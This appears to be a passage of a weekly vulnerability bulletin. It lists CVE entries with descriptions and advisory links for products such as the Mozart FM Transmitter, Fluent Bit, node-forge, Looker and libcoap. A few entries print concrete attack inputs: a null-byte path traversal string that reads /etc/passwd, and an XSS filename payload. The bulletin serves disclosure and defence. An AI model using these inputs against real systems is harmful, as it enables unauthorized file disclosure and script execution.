| DB Electronica Telecomunicazioni S.p.A.--Mozart FM Transmitter | PostgreSQL SQL Injection (status_sql.php) in DB Electronica Telecomunicazioni S.p.A. Mozart FM Transmitter versions 30, 50, 100, 300, 500, 1000, 2000, 3000, 3500, 6000, 7000 allows an attacker to perform SQL injection via sw1 and sw2 parameters in status_sql.php. The `status_sql.php` endpoint constructs SQL UPDATE queries by directly concatenating user-controlled `sw1` and `sw2` parameters without using parameterized queries or `pg_escape_string()`. While PostgreSQL's `pg_exec` limitations prevent stacked queries, attackers can inject subqueries for data exfiltration and leverage verbose error messages for reconnaissance. | 2025-11-26 | not yet calculated | CVE-2025-66260 | https://www.abdulmhsblog.com/posts/webfmvulns/ |
| DB Electronica Telecomunicazioni S.p.A.--Mozart FM Transmitter | Unauthenticated OS Command Injection (restore_settings.php) in DB Electronica Telecomunicazioni S.p.A. Mozart FM Transmitter versions 30, 50, 100, 300, 500, 1000, 2000, 3000, 3500, 6000, 7000 allows an attacker to perform URL-decoded name parameter passed to exec() allows remote code execution. The `/var/tdf/restore_settings.php` endpoint passes user-controlled `$_GET["name"]` parameter through `urldecode()` directly into `exec()` without validation or escaping. Attackers can inject arbitrary shell commands using metacharacters (`;`, `|`, `&&`, etc.) to achieve unauthenticated remote code execution as the web server user. | 2025-11-26 | not yet calculated | CVE-2025-66261 | https://www.abdulmhsblog.com/posts/webfmvulns/ |
| DB Electronica Telecomunicazioni S.p.A.--Mozart FM Transmitter | Arbitrary File Overwrite via Tar Extraction Path Traversal in DB Electronica Telecomunicazioni S.p.A. Mozart FM Transmitter versions 30, 50, 100, 300, 500, 1000, 2000, 3000, 3500, 6000, 7000 allows an attacker to perform Tar extraction with -C / allow arbitrary file overwrite via crafted archive. The `restore_mozzi_memories.sh` script extracts user-controlled tar archives with `-C /` flag, depositing contents to the filesystem root without path validation. When combined with the unauthenticated file upload vulnerabilities (CVE-01, CVE-06, CVE-07), attackers can craft malicious .tgz archives containing path-traversed filenames (e.g., `etc/shadow`, `var/www/index.php`) to overwrite critical system files in writable directories, achieving full system compromise. | 2025-11-26 | not yet calculated | CVE-2025-66262 | https://www.abdulmhsblog.com/posts/webfmvulns/ |
| DB Electronica Telecomunicazioni S.p.A.--Mozart FM Transmitter | Unauthenticated Arbitrary File Read via Null Byte Injection in DB Electronica Telecomunicazioni S.p.A. Mozart FM Transmitter versions 30, 50, 100, 300, 500, 1000, 2000, 3000, 3500, 6000, 7000 allows an attacker to perform Null byte injection in download_setting.php allows reading arbitrary files. The `/var/tdf/download_setting.php` endpoint constructs file paths by concatenating user-controlled `$_GET['filename']` with a forced `.tgz` extension. Running on PHP 5.3.2 (pre-5.3.4), the application is vulnerable to null byte injection (%00), allowing attackers to bypass the extension restriction and traverse paths. By requesting `filename=../../../../etc/passwd%00`, the underlying C functions treat the null byte as a string terminator, ignoring the appended `.tgz` and enabling unauthenticated arbitrary file disclosure of any file readable by the web server user. | 2025-11-26 | not yet calculated | CVE-2025-66263 | https://www.abdulmhsblog.com/posts/webfmvulns/ |
| Desktop Alert--desktopalert.net | An Incorrect Access Control vulnerability was found in the Application Server of Desktop Alert PingAlert version 6.1.0.11 to 6.1.1.2 which allows an attacker to disclose user hashes. | 2025-11-24 | not yet calculated | CVE-2025-54338 | https://desktopalert.net/cve-2025-54338/ |
| Desktop Alert--desktopalert.net | A vulnerability was found in the Application Server of Desktop Alert PingAlert version 6.1.0.11 to 6.1.1.2. There are Hard-coded configuration values. | 2025-11-24 | not yet calculated | CVE-2025-54341 | https://desktopalert.net/cve-2025-54341/ |
| Desktop Alert--desktopalert.net | A Directory Traversal vulnerability was found in the Application Server of Desktop Alert PingAlert version 6.1.0.11 to 6.1.1.2 which allows an attacker to write arbitrary files under certain conditions. | 2025-11-24 | not yet calculated | CVE-2025-54347 | https://desktopalert.net/cve-2025-54347/ |
| Desktop Alert--desktopalert.net | An Incorrect Access Control vulnerability was found in the Application Server of Desktop Alert PingAlert version 6.1.0.11 to 6.1.1.2 which allows Incorrect Access Control, leading to Remote Information Disclosure. | 2025-11-24 | not yet calculated | CVE-2025-54563 | https://desktopalert.net/cve-2025-54563/ |
| Devolutions--Server | Exposure of credentials in unintended requests in Devolutions Server, Remote Desktop Manager on Windows. This issue affects Devolutions Server: through 2025.3.8.0; Remote Desktop Manager: through 2025.3.23.0. | 2025-11-28 | not yet calculated | CVE-2025-13683 | https://devolutions.net/security/advisories/DEVO-2025-0017/ |
| Devolutions--Server | SQL Injection vulnerability in last usage logs in Devolutions Server. This issue affects Devolutions Server: through 2025.2.20, through 2025.3.8. | 2025-11-27 | not yet calculated | CVE-2025-13757 | https://devolutions.net/security/advisories/DEVO-2025-0018/ |
| Devolutions--Server | Exposure of credentials in unintended requests in Devolutions Server. This issue affects Server: through 2025.2.20, through 2025.3.8. | 2025-11-27 | not yet calculated | CVE-2025-13758 | https://devolutions.net/security/advisories/DEVO-2025-0018/ |
| Devolutions--Server | Exposure of email service credentials to users without administrative rights in Devolutions Server. This issue affects Devolutions Server: before 2025.2.21, before 2025.3.9. | 2025-11-27 | not yet calculated | CVE-2025-13765 | https://devolutions.net/security/advisories/DEVO-2025-0018/ |
| Digital Bazaar--node-forge | An interpretation-conflict (CWE-436) vulnerability in node-forge versions 1.3.1 and earlier enables unauthenticated attackers to craft ASN.1 structures to desynchronize schema validations, yielding a semantic divergence that may bypass downstream cryptographic verifications and security decisions. | 2025-11-25 | not yet calculated | CVE-2025-12816 | https://www.npmjs.com/package/node-forge https://github.com/digitalbazaar/forge/pull/1124 https://github.com/digitalbazaar/forge CERT/CC Vulnerability Notice Github Security Advisory |
| digitalbazaar--forge | Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. An Integer Overflow vulnerability in node-forge versions 1.3.1 and below enables remote, unauthenticated attackers to craft ASN.1 structures containing OIDs with oversized arcs. These arcs may be decoded as smaller, trusted OIDs due to 32-bit bitwise truncation, enabling the bypass of downstream OID-based security decisions. This issue has been patched in version 1.3.2. | 2025-11-26 | not yet calculated | CVE-2025-66030 | https://github.com/digitalbazaar/forge/security/advisories/GHSA-65ch-62r8-g69g https://github.com/digitalbazaar/forge/commit/3e0c35ace169cfca529a3e547a7848dc7bf57fdb |
| digitalbazaar--forge | Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. An Uncontrolled Recursion vulnerability in node-forge versions 1.3.1 and below enables remote, unauthenticated attackers to craft deep ASN.1 structures that trigger unbounded recursive parsing. This leads to a Denial-of-Service (DoS) via stack exhaustion when parsing untrusted DER inputs. This issue has been patched in version 1.3.2. | 2025-11-26 | not yet calculated | CVE-2025-66031 | https://github.com/digitalbazaar/forge/security/advisories/GHSA-554w-wpv2-vw27 https://github.com/digitalbazaar/forge/commit/260425c6167a38aae038697132483b5517b26451 |
| Dongyoung Media Tech Co., Ltd.--DM-AP240T/W Wireless Access Point | Dongyoung Media DM-AP240T/W wireless access points contain an unauthenticated configuration disclosure vulnerability in the /cgi-bin/sys_system_config management endpoint. The endpoint allows remote retrieval of a compressed configuration archive without requiring authentication or authorization. The exposed configuration may include administrative credentials and other sensitive settings, enabling an unauthenticated attacker to obtain information that can facilitate further compromise of the device or network. | 2025-11-26 | not yet calculated | CVE-2019-25226 | https://packetstorm.news/files/id/154719/ https://cxsecurity.com/issue/WLB-2019100012 http://dongyoung.com/ https://www.vulncheck.com/advisories/dongyoung-media-dm-ap240tw-unauthenticated-config-disclosure |
| Drupal--Drupal | Webform Multiple File Upload module for Drupal 7.x contains a cross-site scripting (XSS) vulnerability in the file name renderer. An unauthenticated attacker can exploit this vulnerability by uploading a file with a malicious filename containing JavaScript code (e.g., "<img src=1 onerror=alert(document.domain)>") to a Webform node with a Multifile field where file type validation is disabled. This allows the execution of arbitrary scripts in the context of the victim's browser. The issue is present in a third-party library and has been addressed in a patch available at https://github.com/fyneworks/multifile/pull/44 . Users are advised to apply the provided patch or update to a fixed version of the module. | 2025-11-26 | not yet calculated | CVE-2025-12848 | https://www.drupal.org/node/3105204 |
| ESCAM--QD-900 WIFI HD Camera | ESCAM QD-900 WIFI HD cameras contain an unauthenticated configuration disclosure vulnerability in the /web/cgi-bin/hi3510/backup.cgi endpoint. The endpoint allows remote download of a compressed configuration backup without requiring authentication or authorization. The exposed backup can include administrative credentials and other sensitive device settings, enabling an unauthenticated remote attacker to obtain information that may facilitate further compromise of the camera or connected network. | 2025-11-26 | not yet calculated | CVE-2020-36871 | https://packetstorm.news/files/id/156492/ https://www.exploit-db.com/exploits/48107 https://www.vulncheck.com/advisories/escam-qd900-unauthenticated-config-disclosure |
| FAST FAC1200R--sezangel | FAST FAC1200R F400_FAC1200R_Q is vulnerable to Buffer Overflow in the function sub_80435780 via the parameter password. | 2025-11-26 | not yet calculated | CVE-2025-50399 | https://github.com/sezangel/IOT-vul/tree/main/FAST/FAC1200R/1 |
| FAST FAC1200R--sezangel | FAST FAC1200R F400_FAC1200R_Q is vulnerable to Buffer Overflow in the function sub_80435780 via the parameter string fac_password. | 2025-11-26 | not yet calculated | CVE-2025-50402 | https://github.com/sezangel/IOT-vul/tree/main/FAST/FAC1200R/2 |
| FluentBit--Fluent Bit | Fluent Bit in_forward input plugin does not properly enforce the security.users authentication mechanism under certain configuration conditions. This allows remote attackers with network access to the Fluent Bit instance exposing the forward input to send unauthenticated data. By bypassing authentication controls, attackers can inject forged log records, flood alerting systems, or manipulate routing decisions, compromising the authenticity and integrity of ingested logs. | 2025-11-24 | not yet calculated | CVE-2025-12969 | https://fluentbit.io/blog/2025/10/28/security-vulnerabilities-addressed-in-fluent-bit-v4.1-and-backported-to-v4.0/ https://www.oligo.security/blog/critical-vulnerabilities-in-fluent-bit-expose-cloud-environments-to-remote-takeover |
| FluentBit--Fluent Bit | The extract_name function in Fluent Bit in_docker input plugin copies container names into a fixed size stack buffer without validating length. An attacker who can create containers or control container names, can supply a long name that overflows the buffer, leading to process crash or arbitrary code execution. | 2025-11-24 | not yet calculated | CVE-2025-12970 | https://fluentbit.io/blog/2025/10/28/security-vulnerabilities-addressed-in-fluent-bit-v4.1-and-backported-to-v4.0/ https://www.oligo.security/blog/critical-vulnerabilities-in-fluent-bit-expose-cloud-environments-to-remote-takeover |
| FluentBit--Fluent Bit | Fluent Bit out_file plugin does not properly sanitize tag values when deriving output file names. When the File option is omitted, the plugin uses untrusted tag input to construct file paths. This allows attackers with network access to craft tags containing path traversal sequences that cause Fluent Bit to write files outside the intended output directory. | 2025-11-24 | not yet calculated | CVE-2025-12972 | https://www.oligo.security/blog/critical-vulnerabilities-in-fluent-bit-expose-cloud-environments-to-remote-takeover https://fluentbit.io/blog/2025/10/28/security-vulnerabilities-addressed-in-fluent-bit-v4.1-and-backported-to-v4.0/ |
| FluentBit--Fluent Bit | Fluent Bit in_http, in_splunk, and in_elasticsearch input plugins fail to sanitize tag_key inputs. An attacker with network access or the ability to write records into Splunk or Elasticsearch can supply tag_key values containing special characters such as newlines or ../ that are treated as valid tags. Because tags influence routing and some outputs derive filenames or contents from tags, this can allow newline injection, path traversal, forged record injection, or log misrouting, impacting data integrity and log routing. | 2025-11-24 | not yet calculated | CVE-2025-12977 | https://fluentbit.io/blog/2025/10/28/security-vulnerabilities-addressed-in-fluent-bit-v4.1-and-backported-to-v4.0/ https://www.oligo.security/blog/critical-vulnerabilities-in-fluent-bit-expose-cloud-environments-to-remote-takeover |
| FluentBit--Fluent Bit | Fluent Bit in_http, in_splunk, and in_elasticsearch input plugins contain a flaw in the tag_key validation logic that fails to enforce exact key-length matching. This allows crafted inputs where a tag prefix is incorrectly treated as a full match. A remote attacker with authenticated or exposed access to these input endpoints can exploit this behavior to manipulate tags and redirect records to unintended destinations. This compromises the authenticity of ingested logs and can allow injection of forged data, alert flooding and routing manipulation. | 2025-11-24 | not yet calculated | CVE-2025-12978 | https://fluentbit.io/announcements/v4.1.0/ |
| Frappe--Frappe CRM | Multiple SQL Injections in Frappe CRM Dashboard Controller due to unsafe concatenation of user-controlled parameters into dynamic SQL statements. This issue affects Frappe CRM: 1.53.1. | 2025-11-26 | not yet calculated | CVE-2025-11461 | https://fluidattacks.com/advisories/oz https://github.com/frappe/crm https://github.com/frappe/crm/pull/1339 |
| Free5gc v4.0.0--OpenWall | An issue was discovered in Free5GC v4.0.0 and v4.0.1 allowing an attacker to cause a denial of service via crafted POST request to the Npcf_BDTPolicyControl API. | 2025-11-24 | not yet calculated | CVE-2025-60632 | https://github.com/free5gc/free5gc https://github.com/free5gc/free5gc/issues/705 |
| Free5gc v4.0.0--OpenWall | An issue was discovered in Free5GC v4.0.0 and v4.0.1 allowing an attacker to cause a denial of service via the Nudm_SubscriberDataManagement API. | 2025-11-24 | not yet calculated | CVE-2025-60633 | https://github.com/free5gc/free5gc https://github.com/free5gc/free5gc/issues/702 https://github.com/free5gc/free5gc/issues/700 https://github.com/free5gc/free5gc/issues/701 https://github.com/free5gc/free5gc/issues/703 |
| Free5gc v4.0.0--OpenWall | An issue was discovered in Free5GC v4.0.0 and v4.0.1 allowing an attacker to cause a denial of service via crafted POST request to the Nnssf_NSSAIAvailability API. | 2025-11-24 | not yet calculated | CVE-2025-60638 | https://github.com/free5gc/free5gc https://github.com/free5gc/free5gc/issues/704 |
| Fuji Television Network, Inc.--"FOD" App for Android | "FOD" App uses hard-coded cryptographic keys, which may allow a local unauthenticated attacker to retrieve the cryptographic keys. | 2025-11-25 | not yet calculated | CVE-2025-64304 | https://help.fod.fujitv.co.jp/hc/ja/articles/48337068747033 https://jvn.jp/en/jp/JVN63368617/ |
| getsentry--sentry-javascript | Sentry-Javascript is an official Sentry SDK for JavaScript. From version 10.11.0 to before 10.27.0, when a Node.js application using the Sentry SDK has sendDefaultPii: true, it is possible to inadvertently send certain sensitive HTTP headers, including the Cookie header, to Sentry. Those headers would be stored within a Sentry organization as part of the associated trace. A person with access to the Sentry organization could then view and use these sensitive values to impersonate or escalate their privileges within the application. This issue has been patched in version 10.27.0. | 2025-11-25 | not yet calculated | CVE-2025-65944 | https://github.com/getsentry/sentry-javascript/security/advisories/GHSA-6465-jgvq-jhgp https://github.com/getsentry/sentry-javascript/pull/17475 https://github.com/getsentry/sentry-javascript/commit/a820fa2891fdcf985b834a5b557edf351ec54539 https://github.com/getsentry/sentry-javascript/releases/tag/10.11.0 |
| Google Cloud--Looker | An attacker with viewer permissions in Looker could craft a malicious URL that, when opened by a Looker admin, would execute an attacker-supplied script. Exploitation required at least one Looker extension installed on the instance. Looker-hosted and Self-hosted were found to be vulnerable. This issue has already been mitigated for Looker-hosted instances. No user action is required for these. Self-hosted instances must be upgraded as soon as possible. This vulnerability has been patched in all supported versions of Self-hosted. The versions below have all been updated to protect from this vulnerability. You can download these versions at the Looker download page https://download.looker.com/ : * 24.18.201+ * 25.0.79+ * 25.6.66+ * 25.12.7+ * 25.16.0+ * 25.18.0+ * 25.20.0+ | 2025-11-24 | not yet calculated | CVE-2025-12739 | https://cloud.google.com/support/bulletins#gcp-2025-068 |
| Google Cloud--Looker | A Looker user with a Developer role could create a database connection using IBM DB2 driver and, by manipulating LookML, cause Looker to execute a malicious command, due to inadequate filtering of the driver's parameters. Looker-hosted and Self-hosted were found to be vulnerable. This issue has already been mitigated for Looker-hosted instances. No user action is required for these. Self-hosted instances must be upgraded as soon as possible. This vulnerability has been patched in all supported versions of Self-hosted. The versions below have all been updated to protect from this vulnerability. You can download these versions at the Looker download page https://download.looker.com/ : * 25.0.93+ * 25.6.84+ * 25.12.42+ * 25.14.50+ * 25.16.44+ | 2025-11-24 | not yet calculated | CVE-2025-12740 | https://cloud.google.com/support/bulletins#gcp-2025-052 |
| Google Cloud--Looker | A Looker user with Developer role could create a database connection using Denodo driver and, by manipulating LookML, cause Looker to execute a malicious command. Looker-hosted and Self-hosted were found to be vulnerable. This issue has already been mitigated for Looker-hosted instances. No user action is required for these. Self-hosted instances must be upgraded as soon as possible. This vulnerability has been patched in all supported versions of Self-hosted. The versions below have all been updated to protect from this vulnerability. You can download these versions at the Looker download page https://download.looker.com/ : * 24.12.108+ * 24.18.200+ * 25.0.78+ * 25.6.65+ * 25.8.47+ * 25.12.10+ * 25.14+ | 2025-11-24 | not yet calculated | CVE-2025-12741 | https://cloud.google.com/support/bulletins#gcp-2025-052 |
| Google Cloud--Looker | A Looker user with a Developer role could cause Looker to execute a malicious command, due to insecure processing of Teradata driver parameters. Looker-hosted and Self-hosted were found to be vulnerable. This issue has already been mitigated for Looker-hosted instances. No user action is required for these. Self-hosted instances must be upgraded as soon as possible. This vulnerability has been patched in all supported versions of Self-hosted. The versions below have all been updated to protect from this vulnerability. You can download these versions at the Looker download page https://download.looker.com/ : * 24.12.108+ * 24.18.200+ * 25.0.78+ * 25.6.65+ * 25.8.47+ * 25.12.10+ * 25.14+ | 2025-11-25 | not yet calculated | CVE-2025-12742 | https://cloud.google.com/support/bulletins#gcp-2025-052 |
| GroceryMart--GroceryMart | An issue was discovered in file users.json in GroceryMart commit 21934e6 (2020-10-23) allowing unauthenticated attackers to gain sensitive information including plaintext usernames and passwords. | 2025-11-26 | not yet calculated | CVE-2025-65278 | https://gist.github.com/whoisrushi/7e8d15c85221e3f708b7b480e04ab6ca |
| HCL Technologies--HLC | Cross-Site Request Forgery (CSRF) vulnerability in HCL Technologies Ltd. Unica 12.0.0. | 2025-11-28 | not yet calculated | CVE-2025-51733 | https://gist.github.com/ikpehlivan/4361fa808e04d884e4771be88e891ec2 |
| HCL Technologies--HLC | Cross-site scripting (XSS) vulnerability in HCL Technologies Ltd. Unica 12.0.0. | 2025-11-28 | not yet calculated | CVE-2025-51734 | https://gist.github.com/ikpehlivan/4361fa808e04d884e4771be88e891ec2 |
| HCL Technologies--HLC | CSV formula injection vulnerability in HCL Technologies Ltd. Unica 12.0.0. | 2025-11-28 | not yet calculated | CVE-2025-51735 | https://gist.github.com/ikpehlivan/4361fa808e04d884e4771be88e891ec2 |
| HCL Technologies--HLC | File upload vulnerability in HCL Technologies Ltd. Unica 12.0.0. | 2025-11-28 | not yet calculated | CVE-2025-51736 | https://gist.github.com/ikpehlivan/4361fa808e04d884e4771be88e891ec2 |
| iiDk-the-actual--Console | Console is a network used to control Gorilla Tag mods' users and other users on the network. Prior to version 2.8.0, a path traversal vulnerability exists where complicated combinations of backslashes and periods can be used to escape the Gorilla Tag path and write to unwanted directories. This issue has been patched in version 2.8.0. | 2025-11-25 | not yet calculated | CVE-2025-65952 | https://github.com/iiDk-the-actual/Console/security/advisories/GHSA-c3f7-xh45-2xc7 https://github.com/iiDk-the-actual/Console/commit/4bcb1cf23ef78f8e6899dd6fe3afa3b24902e458 https://github.com/iiDk-the-actual/Console/commit/e1005b8754594ad463ae58f8a99decda548b1826 |
| ilevia EVE X1--iSee857 | Cross Site Request Forgery (CSRF) vulnerability in Ilevia EVE X1 Server Firmware Version v4.7.18.0.eden and before, Logic Version v6.00 - 2025_07_21 allows a remote attacker to execute arbitrary code via the /bh_web_backend component. | 2025-11-25 | not yet calculated | CVE-2025-60739 | https://github.com/iSee857/ilevia-EVE-X1-Server-CSRF |
| immonit.com--Monnit | An issue was discovered in imonnit.com (2025-04-24) allowing malicious actors to gain escalated privileges via crafted password reset to take over arbitrary user accounts. | 2025-11-26 | not yet calculated | CVE-2025-50433 | http://imonnitcom.com http://monnit.com https://youtu.be/-BqcdwHgMMA https://github.com/0xMandor/imonnit-ato-advisory/blob/main/CVE-2025-50433.md |
| Intercom, Inc.--Security Point (Windows) of MaLion | Incorrect default permissions issue exists in Security Point (Windows) of MaLion prior to Ver.5.3.4. If this vulnerability is exploited, an arbitrary file could be placed in the specific folder by a user who can log in to the system where the product's Windows client is installed. If the file is a specially crafted DLL file, arbitrary code could be executed with SYSTEM privilege. | 2025-11-25 | not yet calculated | CVE-2025-59485 | https://www.intercom.co.jp/information/2025/1125.html https://jvn.jp/en/jp/JVN76298784/ |
| Intercom, Inc.--Security Point (Windows) of MaLion | Security Point (Windows) of MaLion and MaLionCloud contains a stack-based buffer overflow vulnerability in processing HTTP headers. Receiving a specially crafted request from a remote unauthenticated attacker could lead to arbitrary code execution with SYSTEM privilege. | 2025-11-25 | not yet calculated | CVE-2025-62691 | https://www.intercom.co.jp/information/2025/1125.html https://jvn.jp/en/jp/JVN76298784/ |
| Intercom, Inc.--Security Point (Windows) of MaLion | Security Point (Windows) of MaLion and MaLionCloud contains a heap-based buffer overflow vulnerability in processing Content-Length. Receiving a specially crafted request from a remote unauthenticated attacker could lead to arbitrary code execution with SYSTEM privilege. | 2025-11-25 | not yet calculated | CVE-2025-64693 | https://www.intercom.co.jp/information/2025/1125.html https://jvn.jp/en/jp/JVN76298784/ |
| Intercore-Productions--Core-Bot | Core Bot is an open-source Discord bot made for maple hospital servers. Prior to commit dffe050, the API keys (SUPABASE_API_KEY, TOKEN) are loaded using environment variables, but there are cases in code (error handling, summaries, webhooks) where configuration summaries may inadvertently leak sensitive data (e.g., by failing to redact data in summary embeds or logs). This issue has been patched via commit dffe050. | 2025-11-25 | not yet calculated | CVE-2025-65957 | https://github.com/Intercore-Productions/Core-Bot/security/advisories/GHSA-42j6-x28v-38r8 https://github.com/Intercore-Productions/Core-Bot/commit/dffe050d565a580edfcd0242efa45da88ab31260 |
| JAVA-Oracle | Out-of-bounds memory operations in org.lz4:lz4-java 1.8.0 and earlier allow remote attackers to cause denial of service and read adjacent memory via untrusted compressed input. | 2025-11-28 | not yet calculated | CVE-2025-12183 | https://sites.google.com/sonatype.com/vulnerabilities/cve-2025-12183 https://github.com/yawkat/lz4-java/releases/tag/v1.8.1 |
| jishenghua JSH_ERP 2.3.1--Paxsizy | An issue was discovered in jishenghua JSH_ERP 2.3.1. The /material/getMaterialEnableSerialNumberList endpoint passes the search query parameter directly to parseObject(), introducing a Fastjson deserialization vulnerability that can lead to RCE via JDBC payloads. | 2025-11-25 | not yet calculated | CVE-2025-51742 | https://gitee.com/jishenghua/JSH_ERP https://blog.hackpax.top/jsh-erp/ https://gitee.com/jishenghua https://gist.github.com/Paxsizy/a40334ffa7f05c42bf0348833f830108 |
| jishenghua JSH_ERP 2.3.1--Paxsizy | An issue was discovered in jishenghua JSH_ERP 2.3.1. The /materialCategory/addMaterialCategory endpoint is vulnerable to fastjson deserialization attacks. | 2025-11-25 | not yet calculated | CVE-2025-51743 | https://gitee.com/jishenghua/JSH_ERP https://gitee.com/jishenghua https://blog.hackpax.top/jsh-erp2/ https://gist.github.com/Paxsizy/cd1557aeba8093a8650601c4dbffb6f9 |
| jishenghua JSH_ERP 2.3.1--Paxsizy | An issue was discovered in jishenghua JSH_ERP 2.3.1. The /user/addUser endpoint is vulnerable to fastjson deserialization attacks. | 2025-11-25 | not yet calculated | CVE-2025-51744 | https://gitee.com/jishenghua/JSH_ERP https://gitee.com/jishenghua https://blog.hackpax.top/jsh-erp3/ https://gist.github.com/Paxsizy/cd1557aeba8093a8650601c4dbffb6f9 |
| jishenghua JSH_ERP 2.3.1--Paxsizy | An issue was discovered in jishenghua JSH_ERP 2.3.1. The /role/addcan endpoint is vulnerable to fastjson deserialization attacks. | 2025-11-25 | not yet calculated | CVE-2025-51745 | https://gitee.com/jishenghua/JSH_ERP https://gitee.com/jishenghua https://blog.hackpax.top/jsh-erp4/ https://gist.github.com/Paxsizy/cd1557aeba8093a8650601c4dbffb6f9 |
| jishenghua JSH_ERP 2.3.1--Paxsizy | An issue was discovered in jishenghua JSH_ERP 2.3.1. The /serialNumber/addSerialNumber endpoint is vulnerable to fastjson deserialization attacks. | 2025-11-25 | not yet calculated | CVE-2025-51746 | https://gitee.com/jishenghua/JSH_ERP https://gitee.com/jishenghua https://blog.hackpax.top/jsh-erp5/ https://gist.github.com/Paxsizy/cd1557aeba8093a8650601c4dbffb6f9 |
| jvde-github--AIS-catcher | AIS-catcher is a multi-platform AIS receiver. Prior to version 0.64, a heap buffer overflow vulnerability has been identified in the AIS::Message class of AIS-catcher. This vulnerability allows an attacker to write approximately 1KB of arbitrary data into a 128-byte buffer. This issue has been patched in version 0.64. | 2025-11-29 | not yet calculated | CVE-2025-66216 | https://github.com/jvde-github/AIS-catcher/security/advisories/GHSA-v53x-f5hh-g2g6 https://github.com/jvde-github/AIS-catcher/commit/3de0ef785fc3c96265a71b37df7b0a82cb279312 |
| jvde-github--AIS-catcher | AIS-catcher is a multi-platform AIS receiver. Prior to version 0.64, an integer underflow vulnerability exists in the MQTT parsing logic of AIS-catcher. This vulnerability allows an attacker to trigger a massive Heap Buffer Overflow by sending a malformed MQTT packet with a manipulated Topic Length field. This leads to an immediate Denial of Service (DoS) and, when used as a library, severe Memory Corruption that can be leveraged for Remote Code Execution (RCE). This issue has been patched in version 0.64. | 2025-11-29 | not yet calculated | CVE-2025-66217 | https://github.com/jvde-github/AIS-catcher/security/advisories/GHSA-93mj-c8q3-69rg https://github.com/jvde-github/AIS-catcher/commit/e0f7242eee659909adc11a4c561c3f7011bdefe7 |
| keras-team--keras-team/keras | Keras version 3.11.3 is affected by a path traversal vulnerability in the keras.utils.get_file() function when extracting tar archives. The vulnerability arises because the function uses Python's tarfile.extractall() method without the security-critical filter='data' parameter. Although Keras attempts to filter unsafe paths using filter_safe_paths(), this filtering occurs before extraction, and a PATH_MAX symlink resolution bug triggers during extraction. This bug causes symlink resolution to fail due to path length limits, resulting in a security bypass that allows files to be written outside the intended extraction directory. This can lead to arbitrary file writes outside the cache directory, enabling potential system compromise or malicious code execution. The vulnerability affects Keras installations that process tar archives with get_file() and does not affect versions where this extraction method is secured with the appropriate filter parameter. | 2025-11-28 | not yet calculated | CVE-2025-12638 | https://huntr.com/bounties/f94f5beb-54d8-4e6a-8bac-86d9aee103f4 |
| kotaemon 0.11.0--Cinnamon | An issue was discovered in Cinnamon kotaemon 0.11.0. The _may_extract_zip function in the \libs\ktem\ktem\index\file\ui.py file does not check the contents of uploaded ZIP files. Although the contents are extracted into a temporary folder that is cleared before each extraction, successfully uploading a ZIP bomb could still cause the server to consume excessive resources during decompression. Moreover, if no further files are uploaded afterward, the extracted data could occupy disk space and potentially render the system unavailable. Anyone with permission to upload files can carry out this attack. | 2025-11-24 | not yet calculated | CVE-2025-63914 | https://github.com/Cinnamon/kotaemon https://github.com/WxDou/CVE-2025-63914 |
| krpano--krpano | Reflected Cross-Site Scripting (rXSS) in krpano before version 1.23.2 allows a remote unauthenticated attacker to execute arbitrary JavaScript in the victim's browser via a crafted URL to the passQueryParameters function with the xml parameter enabled. | 2025-11-29 | not yet calculated | CVE-2025-65892 | https://krpano.com/docu/releasenotes/?version=1.23.3 https://krpano.com/forum/wbb/index.php?thread/20554-krpano-1-23-3d-gaussian-splatting-support/&postID=96997#post96997 |
| LFDT-Lockness--cggmp21 | CGGMP24 is a state-of-the-art ECDSA TSS protocol that supports 1-round signing (requires 3 preprocessing rounds), identifiable abort, and a key refresh protocol. Prior to version 0.6.3, a missing check in the ZK proof enables an attack in which a single malicious signer can reconstruct the full private key. This issue has been patched in version 0.6.3; for full mitigation it is recommended to upgrade to cggmp24 version 0.7.0-alpha.2, as it contains more security checks. | 2025-11-25 | not yet calculated | CVE-2025-66016 | https://github.com/LFDT-Lockness/cggmp21/security/advisories/GHSA-m95p-425x-x889 https://www.dfns.co/article/cggmp21-vulnerabilities-patched-and-explained |
| LFDT-Lockness--cggmp21 | CGGMP24 is a state-of-the-art ECDSA TSS protocol that supports 1-round signing (requires 3 preprocessing rounds), identifiable abort, and a key refresh protocol. In versions 0.6.3 and prior of cggmp21 and version 0.7.0-alpha.1 of cggmp24, presignatures can be used in a way that significantly reduces security. The cggmp24 version 0.7.0-alpha.2 release contains API changes that make it impossible to use presignatures in contexts in which doing so reduces security. | 2025-11-25 | not yet calculated | CVE-2025-66017 | https://github.com/LFDT-Lockness/cggmp21/security/advisories/GHSA-8frv-q972-9rq5 https://www.dfns.co/article/cggmp21-vulnerabilities-patched-and-explained |
| libcoap--OISM | NULL pointer dereference in src/coap_openssl.c in OISM libcoap 4.3.5 allows remote attackers to cause a denial of service via a crafted DTLS/TLS connection that triggers BIO_get_data() to return NULL. | 2025-11-24 | not yet calculated | CVE-2025-65493 | https://github.com/obgm/libcoap/issues/1743 https://github.com/obgm/libcoap/pull/1750 |
| libcoap--OISM | NULL pointer dereference in get_san_or_cn_from_cert() in src/coap_openssl.c in OISM libcoap 4.3.5 allows remote attackers to cause a denial of service via a crafted X.509 certificate that causes sk_GENERAL_NAME_value() to return NULL. | 2025-11-24 | not yet calculated | CVE-2025-65494 | https://github.com/obgm/libcoap/issues/1745 https://github.com/obgm/libcoap/pull/1750 |
| libcoap--OISM | Integer signedness error in tls_verify_call_back() in src/coap_openssl.c in OISM libcoap 4.3.5 allows remote attackers to cause a denial of service via a crafted TLS certificate that causes i2d_X509() to return -1 and be misused as a malloc() size parameter. | 2025-11-24 | not yet calculated | CVE-2025-65495 | https://github.com/obgm/libcoap/issues/1744 https://github.com/obgm/libcoap/pull/1750 |
| libcoap--OISM | NULL pointer dereference in coap_dtls_generate_cookie() in src/coap_openssl.c in OISM libcoap 4.3.5 allows remote attackers to cause a denial of service via a crafted DTLS handshake that triggers SSL_get_SSL_CTX() to return NULL. | 2025-11-24 | not yet calculated | CVE-2025-65496 | https://github.com/obgm/libcoap/issues/1745 https://github.com/obgm/libcoap/pull/1750 |
| libcoap--OISM | NULL pointer dereference in coap_dtls_generate_cookie() in src/coap_openssl.c in OISM libcoap 4.3.5 allows remote attackers to cause a denial of service via a crafted DTLS handshake that triggers SSL_get_SSL_CTX() to return NULL. | 2025-11-24 | not yet calculated | CVE-2025-65497 | https://github.com/obgm/libcoap/issues/1745 https://github.com/obgm/libcoap/pull/1750 |
